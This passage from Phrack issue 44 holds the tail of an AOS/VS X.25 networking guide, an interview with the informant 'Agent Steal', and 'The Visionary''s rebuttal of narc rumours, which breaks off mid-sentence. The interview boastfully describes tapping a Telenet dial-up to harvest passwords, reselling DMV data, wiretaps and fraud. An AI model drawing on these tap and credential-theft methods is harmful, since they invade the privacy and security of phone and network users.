directory, for printing (like LPD) and mail (MQUEUE). The format for sending mail on AOS/VS using SMTP is just like on Unix, only the program name is SENDMAIL. The AOS/VS TCP/IP installation usually comes with TCP libraries, such as SOCKIT.LB, which provides ordinary Unix socket functions, from bind(), connect(), and listen(), to gethostbyaddr(), getservbyport(), etc; making it possible to program and compile network applications using TCP/IP routines and the AOS C compiler. For more information about these services, and network programming, read a file about TCP/IP and/or Unix. AOS/VS NETWORK PROCESSES: Each network process usually comprises two other processes, one for local users, and one for remote users on the local host. RMA provides URMA and SRMA; FTA provides UFTA and SFTA, and so on. What does it mean? Simply, the S+ programs are "daemons" for the network actions, and the U+ programs are user executable programs. All the S+ programs are controlled through the NETOP process, while the user programs are executed as programs by individual users. I will take some time to explain these programs and how they work. RMA stands for Resource Management Agent. FTA stands for File Transfer Agent, and VTA stands for Virtual Terminal Agent. The 'U' in the programs stands for "Using" and the 'S' for "Serving." VTA: the SVTA process provides virtual terminals for remote UVTA users, as well as PAD support through PDNs; it controls the system's link to any PDN. Connections can be made from public PADs (like Telenet), and through UVTA or any other PAD interface. SVTA logs command responses and errors by reporting them to the NETOP process, or a facility set by CONTROL @SVTA SET/OUTPUT= and /LOG=. If an error occurs during this logging, OUTPUT is reset to the NETOP process (if something is faulty with the NETOP process, the message is lost). SVTA is controlled through the NETOP process, so SVTA commands are the format of "CONTROL @SVTA ". SVTA commands: SET Sets miscellaneous SVTA parameters, such as whether to include the current time or date at SVTA prompts (/TIME or /NOTIME, /DATE or /NODATE); where and if to send the SVTA process' output (/OUTPUT=[pid #] or [@console] or [process name], or /NOOUTPUT); and where to write SVTA logs (/LOG=file). Logs files are of format SVTA_month_day_year.LOG and is stored in :NET:LOGFILES (unless changed). OWNER Assigns a process name to the SVTA process. If no name is given, SVTA returns its current process name. REVERSE ON or OFF. Tells SVTA whether or not to accept reverse charged (collect) calls over the PDN. STATUS If no argument is given, SVTA issues a global status report. If an argument is given, it can either be @VCONnn -- an SVTA controlled virtual console, or a PID (a report will be generated for all VCONs owned by that PID). The user side, UVTA, is loaded by XEQ UVTA. The user is faced with a prompt, from which he can start connections and issue other UVTA commands. UVTA commands: CALL First and formost, call a remote host. A remote host is a host that has its name in the :NET directory (file type HST). If UVTA can't locate the host in the :NET directory, it reports that the file does not exist. CALL accepts two arguments, the remote host and the remote process. Remote process in in the format of [user]:process. [user] defaults to OP; when this parameter is given, UVTA attempts to connect to a VCON controlled by that process/user combination. The remote process defaults to EXEC (OP:EXEC), which means the user connects to a console controlled by the EXEC program (and faces the usual login procedure). CALL can be replaced by loading UVTA with CALL's parameters. Trying to use UVTA as a sort of RLOGIN by connecting to CLIs will probably not work, since unless the remote CLI has opened a VCON, you will get flooded with "Remote user refused connection" error messages, until you abort UVTA or that CLI does open a console -- all of this, of course, assuming that user is there in the first place and you won't get a "Process unknown" error message. Once connected, ^C^V will abort the call and the UVTA process. ^C^T will break from remote mode to the local UVTA prompt. RCONTROL The control character (not including Ctrl-C) to break from remote mode to the local prompt. 'A', 'B', 'E', 'Q', 'S' and 'V' are taken by the system and cannot be used. EXECUTE Execute the parameter issued as a son process of your UVTA (this will fail if you don't have the privilege to create son processes without blocking the father). The File Transfer Agent, FTA, is something like the FTP port to X.25. A user using UFTA can connect to a host running SFTA, supply a valid username/password pair, and transfer files from or to the remote host. A short summary of UFTA commands, in the order they are usually executed: CALL Connect to the remote host, given as an argument. Once connected, a ^C^A sequence will abort a transfer in the middle. USER Supply a username to the remote host, or if no argument is given, assume the local username to be identical to the remote one. In any case, a password must be supplied. SUPERUSER If the user given through USER has Superuser privileges, will turn them for the file transfers (you can now take or put files that you couldn't before, because of the ACLs). FILES FILES takes one argument, being the directory which contents will be listed. FILES takes most arguments the CLI FILES takes (/ASSORTMENT, /TYPE, etc). TYPE Display a remote file. STORE Transfers the local file, 'l', to the remote destination file, 'r'. STORE will fail if the user is not privileged for the action, or if he is trying to transfer an irregular file, such as a network host file. Switches are: /APPEND, to append the file to the destination; /COMPRESS, to compress data for the transfer, and /DELETE, to delete the destination file if it already exists. File transfer modes are controlled through the /BLOCK and /RECORD switches. /BLOCK, the defaults, means block-by-block transfers, and /RECORD means to transfer each record in the file at a time. RETRIEVE Transfers a remote file, 'r', to the local destination, 'l'. The same restrictions and switches for STORE apply here. RECOVER RECOVER is the command used for recovering aborted transfers. Both STORE and RETRIEVE have another switch called /RECOVER. When used in conjunction with that switch, the transfer request's working set is kept. Thus, if a transfer was stopped by ^C^A, it can be resumed by RECOVER. Without the "id" argument, RECOVER lists all the transfer IDs (which are actually interrupted transfers) it can recover. SEND Will send "msg" to the operator on the remote host. The message is sent to the SFTA on the remote host, and forwarded to the operator from there. The X25 process controls X.25 connection over the AOS/VS network. It controls accounting, virtual connection handling, links, and so on. X25 commands, operated through the NETOP process (CONTROL @X25): ACCOUNT Enable or disabling the accounting function of X25. NOACCOUNT STATUS Displays the status of a virtual connection. It displays the remote address, number of packets passed, connection state and the user of the connection. Note that virtual connection numbers are reported by X25 as octal numbers and are therefore read as such. CLEAR Clears a virtual connection, after informing its local owner of the clear. CUSTOMERS Displays a list of X25 customers, meaning processes which have connected to and have not yet disconnected from X25, and are therefore known by it. LSTATUS Displays a status report about a logical link (host). The report gives details about the device status and number of bytes tranfered. TRACE Starts a trace of an X.25 connection to the file NOTRACE specified as the argument. X25 defaults to trace everything -- anything coming out of or going into the system, however this can be overridden by using /LINK=link to trace connections to a specific link, /VC=oct# to trace a specific virtual connection, or PID=pid# to trace virtual connections owned by the process given. NOTRACE stops the trace. X25 trace files must be displayed through another network utility (not an X25 subcommand), called NTRACE. NTRACE takes as an argument the file in which X25 stores trace info, and displays it in human readable format according to its switches, which are: /DIRECTION=[BOTH|INCOMING |OUTGOING], for packet directions (defaults to BOTH); /LIST=file, for the file to which output goes (defaults to the terminal); RLENGTH=[ALL|#], for the number of bytes from the packets to be displayed (defaults to ALL). The last switch is the packet types to be displayed (default to every packet), and is: Type Incoming calls Outgoing calls -------------+--------------------------------+-------------------------- /CALL Incoming call Call request /CONNECT Call connected Call connected /CI Clear Indication Clear request /CCFM Clear ConFirMation Clear confirmation /DATA Data Data /INTERRUPT Interrupt Interrupt /INTCFM Interrupt confirmation Interrupt confirmation /RCVR RR - receive ready RR /RNR RNR - receive not read RNR /REJ -- REJ - reject /RSTIND Reset INDication Reset request /RSTCFM Reset confirmation Reset confirmation /RRTIND Restart indication Restart request /RRTCFM Restart confirmation Restart confirmation The 2nd and 3rd columns in the chart specify what the packet means if the local host is being connected to (incoming call) or is trying to reach another host (outgoing). RESOURCES Displays any connections owned by . can be a process ID, or of the format username:processname. One of the more interesting programs in XODIAC networking is NETGEN. NETGEN (in :NET:NETGEN) is a program used to configure the network: host addresses, routes, services, and so on. When NETGEN is loaded, it enters interactive mode and enables the user to configure and change network settings from menus. Later, it can be called using its one and only switch, /RECREATE=, to re-create the network files in :NET according to the specification file given in . NETGEN's main menu, gives three options (other than terminating). Creating or modifying a specification file, and creating configuration files. The specification file contains in it, o details pertaining to the local host's configuration on the network: the host ID, host name, domain, etc; o hardware device configuration: device name, type, code, and miscellaneous details varying from device type to another; o link configuration: link name, device name/type it uses, and (changing on the type of device), network type, line number, protocols, X.25 packet configuration (size/window size/retries), duplex, and more; o general network attributes: extended addressing, diagnostics, calling DTE in outgoing calls, etc; o X.25 configuration: packet/window size negotiation, reverse charging, NUIs, etc; o virtual calls configuration: permanent virtual calls, VC numbering, etc; o remote host configuration: X.25 parameters, link to be used, address (decimal/hex), name, host file name, etc; o network processes configuration: name, ACL, and other details (varies). Upon loading NETGEN, there are about three menus branching off from every option, so I cannot really mention everything. However, since it's mostly self explanatory, I am putting in here the output from NETGEN's Print Specifications entry, edited to show X.25 links through Telenet and the local configuration, plus TELNETD. By looking at it, one might learn how NETGEN looks/operates, and what details are available. This file was created using (from the main menu): 2. Access/Update Spec File => 7. Print Configurations => file (instead of @LPT). ----------------------------------------------------------------------------- ((Actual details changed.)) NETWORK SPECIFICATION PRINT FILE Specfile: :NET:NETGEN:SPEXBAKZ Date: 32-Nov-93 Time: 4:66:22 PM LOCAL HOST CONFIGURATION Local Host Name : PATBBS ACL : + ORAEW Host ID : 7 Do you wish to specify an NSAP for this host?: Y NSAP Address: Authority and Format Identifier (AFI) (0-99): 50 Initial Domain Identifier (Local Form): null Domain Specific Part (max 19 ascii characters): patbbs DEVICE CONFIGURATION Device Name: ISC_DCF Device Type (DCU,MCA,NBS,ISC,PMGR_ASYNC,ILC, ICB,IBC,LLC,SNA,LSC,IDC,LDC,MRC,IRC,LRC,XLC,XSC): ISC Device code (in octal): 37 Run SDLC or HDLC on this controller: HDLC LINK CONFIGURATION Link Name: SPRINTNET Device Name: ISC_DCF Device Type: ISC Network Type : TELENET Line # (0-7) : 0 Protocol Type(LAP,LAPB,SDLC) : LAPB Local Host Address (2-15 decimal digits) : 31109090063100 Sequence Numbering Modulus (8,128) : 8 Connect retry count (0-99) : 20 Transmit retry count (0-99) : 10 Transmit timeout (-1,0-3600) : 3 Enable timeout (-1,0-3600) : 30 Frame Window Size (1-7) : 7 Packet Window Size (1-7) : 2 Max Packet Size (32,64,128,256,512,1024) : 128 Framing Type (HDLC,BSC) : HDLC HDLC Encoding (NRZ,NRZI) : NRZ Clocking (EXTERNAL,INTERNAL) : EXTERNAL FULL or HALF duplex line : FULL -------------------------- Virtual Call Numbering -------------------------- # PVC'S : 0 # SVC'S : 63 Start SVC # : 1 ------------------------------------------------------------------------------ Network Attributes ------------------ Calling DTE in Outgoing Calls (Y/N): Y Personal Cause Code (Y/N) : N Long Interrupt Packets (Y/N) : N Timeout Resets (Y/N) : Y Timeout Clears (Y/N) : Y Mandatory Diagnostics (Y/N) : N Extended Addressing (Y/N) : Y Extended Clear Packets (Y/N) : Y X25 Facilities Enabling ----------------------- Allow packet size negotiation (Y/N) : Y Allow window size negotiation (Y/N) : Y Allow fast select (Y/N) : Y 1. local connections (Y/N) : N 2. routed connections (Y/N) : N Allow reverse charging outgoing (Y/N): Y Allow closed user groups (Y/N) : Y Allow network user ID (Y/N) : Y Allow throughput class (Y/N) : Y Allow transit delay (Y/N) : Y Allow transit delay indication (Y/N) : Y Allow charging information (Y/N) : Y Allow RPOA selection (Y/N) : Y Allow user defined facilities (Y/N) : Y Allow unknown facilities (Y/N) : Y Allow extended facilities (Y/N) : Y Allow facilities to be routed (Y/N) : Y X25 Facilities Generated? ------------------------- --------- 1. Packet Size Facility N Minimum: 32 Maximum: 128 2. Window Size Facility N Minimum: 1 Maximum: 2 3. Fast Select Facilities N Type: 4. Reverse Charging N 5. Closed User Groups N Type: None ID: -- 6. Network User ID N ID: 7. Throughput Class N Called: Calling DTE: 8. Transit Delay N Delay: 0 9. Charging Information N Request? N 10. RPOA Selection N # IDs: 0 11. User Defined Facilities N 12. Other Facilities N REMOTE HOST CONFIGURATION ----------------------------------------------------------------------------- BOOMBOOM X.25 Host Parameters Remote Host Filename : BOOMBOOM Remote Host Name : BOOMBOOM Remote Host ID : None Hostfile AOS/VS ACL : + RE Accepts address extension facilities?: N Link Name Device Type Network Type Remote Address 1 SPRINTNET ISC TELENET host address in decimal : 31109200010200 ----------------------------------------------------------------------------- NPN CONFIGURATION ----------------------------------------------------------------------------- TELNETD NPN-type entry name: TELNETD NPN: 0023 NPN AOS/VS ACL: + RE ----------------------------------------------------------------------------- ACRONYMS ~~~~~~~~ ADM Automatic Density Matching CLASP CLass Assignment And Scheduling Package CLI Command Line Interpreter CPL Characters per Line IPC Inter-Process Communications LPP Lines per Page PID Process ID; PID 2 is the "master CLI" SMI System Manager Interface ==Phrack Magazine== Volume Four, Issue Forty-Four, File 16 of 27 **************************************************************************** An Interview With Agent Steal By Mike Bowen, Agenta Aka Agent 005 Please note that all of the information in this interview is documented in F.B.I. files and can be verified. ______________________________________________________________________ MB: Well I guess the first question is the biggest one. Is it true that you are an F.B.I. informant? AS: Yes. MB: Why? AS: First of all I didn't have that much of a choice. If I didn't cooperate with The Bureau, I could have been charged with possession of classified government material. That carries a penalty of over 10 years. There is not a lot of people that I would go to jail that long for. I was able to keep my two closest friends out of trouble. That was part of my deal. It was already too late for Kevin Poulson and Ronald Austin. MB: Yeah, I think that most hackers would have done the same as you. AS: Most hackers would have sold out their mother. laughter MB: How come you never busted me? AS: Well I certainly had the opportunity to. You probably remember that I was calling you about a year ago and poking you for information. I just didn't consider you to be a dangerous or malicious hacker. MB: Thanks, I guess. AS: Just make your check out to.... laughter MB: As everyone should know, Kevin Poulson "Dark Dante" was your partner. That was what you referred to in your BBS posts as The Inner Circle 1990. Poulson was featured on TV's' Unsolved mysteries as a wanted fugitive hacker. The United States Attorney called him, "The Hannibal Lecter of computer crime". AS: I would not compare him to Lecter, I would say he is more of a G. Gordon Liddy. laughter MB: Regardless, Kevin is now in jail awaiting trial in San Francisco. He has been there for two years and when he is done, there are more charges awaiting him in Los Angeles. He may spend up to 15 years in prison. How much time do you think that you will do? AS: The six months I did in Texas while I was negotiating my plea agreement will probably be it. MB: How many people did you have to bust to get out of that one? AS: I'm not at liberty to say MB: I see. So are you still involved with the F.B.I.? AS: I believe that my cover is pretty much blown at this time so my usefulness is limited. I would say that I'm done. However, I have received several other offers to work with other computer security related organizations. So watch your asses kiddies, it's easy to change my handle! MB: Why do you think you are getting these offers? You are a convicted felon. AS: I guess I have an honest face, heh, and the work I did for the bureau was very good. I think I was cut out to be in the investigative business. MB: Well, you have been working for private investigators for quite some time. AS: Yes, I handled all of their computer information searches in addition to phone tapping, break ins, phone tap and bug detection. MB: Was that profitable? AS: Well, in addition to all of those radio station contests we were winning, I was doing OK. Driving a Porsche and living in Beverly Hills wasn't to bad. MB: I guess all good things come to an end. AS: I will always manage some how, I'm a survivor. MB: There was another partner involved with you. Wasn't his name Ron Austin? AS: Yes, he got busted too. MB: How much trouble is he in? AS: He is going to testify against Poulson also, so he'll probably only get a year or two. MB: Are you two still friends? AS: Very much so. He understood the situation I was in. I still talk to him frequently. MB: What is he up to these days? AS: He told me he was going to find a cause and become the first computer hacker turned international terrorist. laughter MB: I wouldn't want to be his enemy! Speaking of enemies, what do you think Poulson will do to all the people who testified against him when he gets out? AS: Well he is going to be busy. Everyone who he has ever known has turned against him. MB: Well if he wasn't such a sneaky jerk maybe someone would like him. AS: He brought it on himself. MB: Do you expect any retaliation from the hacker community? AS: There will probably be a few narrow minds out there. However, I have been very careful to conceal my true identity. People may know my real name if they read the papers, but that won't get them far. I find people for a living, I don't think it will be hard to use what I know to keep a low profile. Besides, what is a hacker going to do, turn off my phone? Regardless, If some one fucks with me, I'll just have to fuck back. I have a lot of friends and resources now. MB: What was it like working with the F.B.I.? AS: Very interesting and educational. I have learned a lot about how the bureau works. Probably too much. Obviously I can't say very much. However, I can say that my involvement was extensive. There was a lot of money and resources used. In addition, they paid me well. MB: Would you say it was fun? AS: Most of the time. They actually flew me to Summer Con in St. Louis. I would say the bureau had that conference pretty well covered. Erik Bloodaxe was there too. It was pretty funny. I think we both knew that each other was working for the bureau. One of the agents I worked with let it slip out. We were sitting across from each other at the conference, kind of smirking at each other. And the balls Erik had! He video taped the whole thing! It was classic. MB: What was the F.B.I. trying to accomplish? AS: I believe they were trying to send a message that high level computer hacking is something that is very serious. In Poulson's' case as you are aware, we got into some really heavy shit. So heavy in fact that I had to sign an agreement that I would never disclose any of the top secret information that I had seen. MB: That's pretty wild. The article about Poulson, Austin and you in The Los Angeles Times Sunday Magazine was really interesting. For those who want to read it the date was September 12, 1993. AS: I was amazed how deep that reporter was able to go. He really hit the nail on the head. Personally I think he wrote too much. He wrote that we were able to get a list of every federal wire tap in California! MB: Really? laughter AS: Like I said, I can neither confirm or deny that statement. There is still a lot of information regarding our activities that has not been published. Between the three of us, we were into a bunch of shit. One of these days, it will all be out. MB: The reporter also said you would take control of phone lines with a telephone company computer. Then you would seize radio station lines and win contests. AS: Now that we can talk about. We won tens of thousands of dollars, trips to Hawaii and a few Porsches. The government took both of my Porsches away from me. MB: I didn't realize that you had two. AS: Yeah, a friend of mine was selling his. So I had him report it stolen and collect the insurance. I gave him a $1000 and it was mine. I loved that car. MB: I see that was the interstate transportation of a stolen automobile charge that was filed in Texas? AS: Yeah , I changed the VIN numbers and everything. It was really clean. However, when I got raided they went over everything with a fine tooth comb. There were so many agencies involved. The F.B.I., The Secret Service , SW Bell Security, Pacific Bell Security, Dallas Sheriff, L.A.P.D. Computer Crime Unit, The United States Postal Inspector, Telenet and Tymnet Security and eventually The Department of Motor Vehicles Security Unit. What a mess, everyone wanted a piece of the action. But you know who always gets their man. MB: The Bureau. AS: Yep, pissed a few people off too. MB: Where did you get the name Agent Steal? AS: About ten years ago, I was under investigation by The Secret Service for computer hacking. The case agent was Special Agent Steele. That is when I became a fugitive. I left town, dropped contact with my friends, and changed my name. I moved to California. MB: What are some of your favorite hacks? AS: Probably the Telenet tap I put up. MB: You mean the private dial up tap that you had told me about? AS: Yeah, I placed the order in COSMOS for a bridge lifter on the first line in hunt of my local Telenet dial up and a 1FR to appear in an office building a half mile from the LA Telenet dial up. MB: That was great. That device you built was cool. All you had to do was dial up the number, connect with your modem and you could sit there and watch people type in their passwords all day long. AS: I must have snagged over 500 accounts on that thing. MB: That's where you got your DMV account wasn't it? AS: Yes. I made a small fortune reselling the information to P.I.s' MB: What was it you told me about tapping Heidi Fliess? AS: Yeah. I tapped the phone of one of her working girls. It was for this rich guy who would hire hookers and then get involved with them. He loved hookers. He used to keep tabs on this one. MB: What were the conversations like. AS: I rarely would listen to the tapes I made. I have a life, thank you. Besides, I have found that about 99.9% of all phone conversations are really boring. MB: Have you listened to many? AS: Thousands, from cellular to cordless to inter office T-carrier lines to long distance microwave. I guess I am a phone tap expert. Poulson and I would break into C.O.s on a regular basis. We had our own keys and I.D. badges. We came and went as we pleased. I would sometimes play around with the long distance trunks. That was always interesting. With a T-carrier test set you could scan through all of the channels and hear dozens of phone calls with the flick of a switch. MB: What is the most powerful computer that you had access to. AS: Good question. There really isn't one computer system out there that is "all" powerful, with the exception of maybe some defense computers. I made a point of staying away from those. However, if I had to pick just one computer to have access to I would say it was XXXXXXX. That was the Pacific Bell system that allowed us to drop in and monitor and control phone lines from home with the use of a computer system. Second would have to be DMV or COSMOS. Yes COSMOS. I thought that being able to place my own orders was important, not to mention more reliable than the business office. MB: Cheaper too. laughter AS: I wish I had all the money I have saved on phone bills! MB: Those days are gone. AS: At least the days of doing that safely. People tend to get pessimistic about hacking. I have heard some say that the good old days of boxing and such are gone. I disagree, we just have to adapt. As sure as technology advances so will hacking. There will always be new "hacks". It's up to the real hackers to find them. Learn from the past and move on or get busted and quit. MB: What is up with Kevin Mitnick? AS: I had never met him before I was busted. When I went to work for the bureau I contacted him. He was still up to his old tricks so we opened a case on him and Roscoe. It's a long story but they wound up getting busted again. Mitnick got tipped off right before they were going to pick him up. So he's on the run again. Roscoe wasn't so lucky. This will be Mitnick's fifth time to get busted. What a loser. Everyone thinks he is some great hacker. I out smarted him and busted him. Poulson blows him away as well. MB: Do you feel bad about working undercover to arrest hackers? AS: Not really. We all know the risks. For me it was just a job. And an interesting one at that. I wasn't out there just busting anyone. We were looking for the hard core malicious hackers. I passed up a lot of people in the course of the investigation. They should know who they are by now. The ones that got taken down deserved it. It will all be in the papers some day. MB: Did you deserve what you got. AS: Yeah, I was getting pretty carried away there for a while. I invaded a lot of peoples privacy. Phones taps, credit reports, breaking into Pacific Bell offices etc. MB: Didn't you break into PacBells' security department? AS: Yes, Poulson and I broke into the high rise downtown. We wanted to find out how far their investigation of us had gone. MB: Did you find what you wanted? AS: Yeah, DNR print outs, notes and photos! We also found a lot of information regarding other investigations and how they do wire taps. MB: Very dangerous in the wrong hands. AS: We are the wrong hands. laughter MB: Oh yeah. How did you get caught? AS: Well as you know I moved to Texas after that high speed chase with the L.A.P.D. undercover units. I found out that I was under surveillance and had to make a run for it! MB: Was that pretty close? AS: In a Porsche on a canyon road? Not until the helicopter appeared! MB: How did you get away? AS: I parked the car in a garage after losing them then hid under another car for three hours. They eventually gave up looking. I called a cab with my cellular phone and left the area. Getting back to getting caught. I believe it was from an elaborate multi-company phone trace. I didn't think that they would go through all the trouble to try and trace my calls though several carriers. But I guess they did. The Pacific Bell people were very hot for me. They must have pulled everyone together. MB: This sounds like a book or a made for TV movie. AS: One can only hope. ==Phrack Magazine== Volume Four, Issue Forty-Four, File 17 of 27 **************************************************************************** [Editor's commentary: What you are about to read is a file that everyone's friend Pat (Visionary / Traxxter) had written some time ago and is currently being spreading around the net. Bear in mind that this file is exactly as he wrote it. (IE: no spell-checking or other editing has been done.) I want to add something from my own personal experience with Traxxter. At Comsec one evening, we received a phone call from Pat. Scott and I took the call and listened to Pat for nearly an hour. During this call Pat continually over-stressed the point about how much he hated being called a narc. He said "I know you guys understand about turning people in, now that you are doing Comsec." In his thinking that by our new charter as security consultants we were suddenly policemen as well, he went into a big spiel about his involvement with security officers at long distance carriers and how he regularly provided information to them. Now, you may feel that whatever transgressed between Pat and the locals causing him and his family so many problems may or may not warrant the action that was taken by them. I personally follow a simple rule regarding such things: If you mess with me at home it's just a pissing match and I'll insult you back night and day, but if you try to come between me and my livelihood or my ability to work or put food on my table I'm gonna put you in jail. Obviously I'm not the only one who feels that way. In all honesty, I could care less about this, but since Pat submitted this file to Phrack, I am going to give it fair treatment and publish it for him.] ----------------------------------------------------------------------------- Visionary The Story About Him. This file is beeing published due to the wide spread rumors about a hacker known as The Visionary. The reason behind the distribution of the file is to clear up a lot of misconseptionspeople have about this individual. Those reading it are asked to keep an open mind. Encluded in the file will be buffers from people who know The Visionary. After reading it there is hope the rumors come to an end. There have been a number of stories that people have brought up in relation to The Visionary. So you will hear the truth in relation to each story. Many have been spreading rumors without getting the facts first, so therefore a lot of stories going around were either overdramatised or without foundation. The first thing that originally started the rumor was an event which happened in the mid 1980s. The Visionary had been modeming for just over a year back then. He as well as several other people had become associated with some other local hackers. The local hackers in question were, Oedipus Rex who ran a board known as The Apple Tree in 305. The other two were known as Unknown Soldier of LOD and a guy known as The Technician. There were a couple others involved with them but the identity is not known. Anyway they became angery at the other hackers I knew and started unnecessary problems. Unknown Soldier giving out the number to his other friends in order to harass a kid known as The Insider. Every time Insider had his number changed to a nonpublished one, Unknown Soldier loged into Cosmosand using his knowledge obtained the new number At the same time Oedipus Rex along with his friends were pulling other serious things on me as well as the local people I knew. 1. He would harass me and my parentsall times of the night. On two ocations he was seen driving in my neighborhood on the same night someone shot my front windows out. It was shown the Unknown had logged on TRW and obtained the credit history belonging to my pa parents as well as otherpeople's parents. On one ocation Oedipus Rex with a few others had convinced a few of my friends to meet them at a remote location after a hacker meeting. When this happened OedipusRex sprayed the people with a substance known as mace. This amoung other things like, property damage, credit information being changed and other acts of anarchy were performed against us. I The Visionary don't know why they started on me as well when I did nothing to diserve this. Things come to ahead when The Unknown Soldier bragged to one of us that he could get confidential information on their parents. The kid he was bragging to went to his parents because there was already problems. His father got the local Bell operating company involved and things progressed from there. Inside five months Unknown Soldier was busted and charged with illegal entry into Suthern Bell's computer and CBI credit bureau. He had to pay $1,500 to both Bell and CBI indamages. It's not known how much the state fined him. It was shown that The Visionary's parents credit history was effected in a negative way by this guy. After the bust the local authorities spoke to The Visionary in regards to this guy. Now any hacker out therewith any common sense can understand why Visionary did not hold back when asked about these guys. As any hacker knows nobody should use their knowledge against someone else. Especially if they are going to use the parents as the target. Visionary was more than in his rights to do what he did. And due to the fact this story was told without the entire facts known it has been twisted into a gross rumor. For about two years after that Visionary dropped out of the seen due to person reasons. In late 1987 he returned back in the seen as The Traxster. At there were no rumors until Lex Luthor of The Legion of Doom found out about him. Than the rumors started again. "I don't know why people brought up the event which happened years ago when it was long and forgoten," is one thing The Visionary said. From 1987 throughout 1988 a lot of people always spoke of Visionary back than known as The Traxster. In the last four years certain things have been brought to light regarding Visionary. These events were generally recordings of Visionary either admitting to being a narc, or one was of him talking to a suposed MCI Security agent. When you read the following accounts, remember logic will play a big part in not onlyunderstanding the truth behind them, but you will find out that Visionary's side is a lot more credible than of the rumors. The following is Visionary's own account in relation to the MCI tape that a lot heard but don't know the facts behind. "It was during the early of sumer of 1988 when I had an interesting incounter with a hacker posing as an MCI Security agent. I didn't know it at the time but someone was oviously playing a large trick on me as it was recorded either by the hacker or a person on his threeway. Those reading this keep in mind I am going from memory and I may not be able to recall every small detail. I will say this much, I have the tape of the event that I obtained and anyone who listens to it will know that is no MCI agent I am talking to. I had one ocation where I was due to meet someone on a loop. Which loop and who I was supose to meet I don't recall. Anyways I had been on a loop waiting for another hacker. After a minute a guy comes on the loop. Upon asking his handle he said he was from MCI Security. At first I laughed and asked who he was kidding. I mean people MCI isn't going to call a loop and identify themselves as such. Well I decided after he insisted very sincerely he was MCI, I decided to play along. I made up the story that I was someone that delt with telco security and wouldn't mind talking to him. We started talking about things like ANI and different services. Keep keep in mind I know he wasn't MCI at all. The conversation lasted around thirty to fourty-five minutes. I am able to give some idea of time beings I have the tape and have listened to it. After the event I forgot about the entire thing. It wasn't until a few months later when I heard about the recording with me talking to MCI. At first I was extremely puzzeled by this news. Than I heard samples of the recording and instantly knew what it was about. Now when listening to the tape you will find a couple things very strange about it. When people told me about it, I was told that someone had remobed my line, someone had used LMOS and other outlandish things. When listening to the tape the first thing that is ovious is the suposed MCI guy I am talking to is much louder than me. I mean you can hear him booming compared to my side of the conversation. The second thing is you hear music in the background. The last fact mentioned is not important but could be if you listen to it. This tape caused a lot of people to have second thoughts of associating with me. When one hears it, usually it sounds pretty real if you make a quick judgement. People such as Phiber Optic, Zod of MOD and even a local friend of mine who knew me for a long while were convinced by it. I feel that either someone had either played a bad trick on me, or it was a situation where two people happened to find me and I become an unfortunate victom. At the time the rumors had pretty much stopped and if the tape hadn't come about I suspect things would have blown over. The second event involving me on tape, was with me and Doc Haliday. It was in the fall of 1990, during the time of the 404 bridge. The rumor about me had still been going on due to the MCI tape. One of the hackers that happened to call the bridge was Doc Haliday. Doc Haliday is a somewhat wellknown hacker who associates with people in the Texas area. He was known to frequent a HP board known as Unholy Temple, and he has also written for Phrack. One particular ocation, Visionary was on the 404 bridge he met Doc Haliday. Doc Haliday called him shortly after they met on the bridge. The first conversation was about the rumors he heard about Visionary and his thoughts on them. Haliday than related to Visionary that he didn't aprove of a lot of hacker activity now a day. He said in so many words the stuff hackers seemed to do was extremely wrong. This statement didn't hit Visionary quite right, due to the fact Doc Haliday had been into hacking a long time. Doc Haliday's next statement made Visionary feel there was more to him than met the eye. "I don't aprove of those who use access devices," stated Doc Haliday to Visionary. Now anyone reading this may know it, but the term access devices or access codes is the legal term the authorities use in court cases. When Visionary heard this, the first signs of dout about Doc Haliday began. "When he used the term access devices, an allarm bell went off in my head," was Visionary's words. The next day, again him and Doc Haliday had another conversation. This is when Visionary had his douts confirmed. Haliday started out by informing The Visionary of an investigation on the 404 bridge. He said a friend of his from The Secret Service had warned him, due to an inpending bust of a number of people. This news shocked Visionary like a slap in the face, and things started getting stranger. Doc Haliday explained there was a lot of monitoring of the bridge, as well as a pending investigation on Super Niggar. At this point Vision made a decision to play his Trump card. Slowly Visionary was able to get Haliday to admit that he did next to nothing illegal any more. When asked Haliday gave an impression he was not against informents but was open to it himself. This is when Visionary began to lead Haliday to the belief that he was an informent. Haliday bought the bate hook line and sinker. He told Visionary all about the dealings with Secret Service in the past, and how he had made six federal cases for them thus far. Visionary made up a story to the effect of him beeing involved in simular activities. The entire thing on Visionary's part was to confirm his own douts regarding Haliday. However one thing happened which screwed up Visionary. Doc Haliday had been recording the entire conversation. After he hung up from Visionary, he proceded to play it to everybody. His reason for saying what he said was to bolshit Visionary into admitting to narcing. All of y The people that heard the tape were not able to hear the entire thing. Haliday only played segments and made himself the big social enginer. Some of you out there may ask, who should believe? Well look at it this way. if you hear the tape or hear Haliday's side it sounds like he is bolshitting Visionary. However again like the other time to many things don't tigh together. First off Visionary, if he was an informent would not admit to anybody as such. It may seem to some that a confidents was built but Visionary would not be that stupid. Remember people he has a lot of rumors go around about him. A couple other things come into play here. Doc Haliday was a very smart and carful individual. He didn't associate with any of the normal crouds, nor did he even associate with most better hackers. So, ask yourself, why did he go to such length to expose what he thought was a narc? Visionary didn't even talk to anyone Haliday knew nore did Visionary pose a threat to Haliday. A major thing all of you will remember, is Doc Haliday is part of the security firm known as Comceck in Texas. This is not mean much on one hand, but Haliday is involved with computer security. Visionary was bolshitting Haliday and when looking at the situation the truth speaks for itself. Any of the higher up hackers don't concern themselves with such matters of a narc. They don't give two shits about lamers, yet Haliday tried to convince all of them with his tape. Thus far you have read the main three reasons Visionary has had the constant rumor which persists about him. Now we will cover some of the little reasons that, may not deal with tape recordings, can be misunderstood as fact. One must take into consideration that Visionary had to put up with a lot of shit due to the rumors, and he had to do some interesting stuff to get by. One thing he did, was to let certain hackers think he was a narc. All of you out there will ask why would he do this? Well it's simple. Visionary ran acrossed some people that it was to his advantage to let them believe anything. One case with the members of a group known as MOD. MOD was known by many to harass a lot of people. They had heard about Visionary, and believed that to harass someone in his line of work would be the death of them. Anotherwords, if you are a neighborhood vandle, your less likely to bother an authority figure. To them Visionary was an authority figure. That was not the only ocation Visionary had let people believe he was an informent of some kind. Visionary found it was easier in some instances if certain people were set on believing the rumors, that they were better off deceived in that way. Certain people, Visionary found would trust him more if they thought he worked for a certain ld service. One particular instance, involved a local friend of Visionary's. The kid, had heard a lot of rumors. Visionary had got him started in the shit, but what convinced the kid was the famous MCI tape. Visionary, finally told the kid he worked for MCI, and no government agency. When the kid in question heard this he was able to talk to Visionary easier. The logic here, is the kid didn't know what Visionary did. If he did work for the FBI or Secret Service, he felt in danger by that. But As the local kid didn't use MCI it made him trust Visionary. See people there was the same reason Visionary told several people that. People, like that kid as well as others 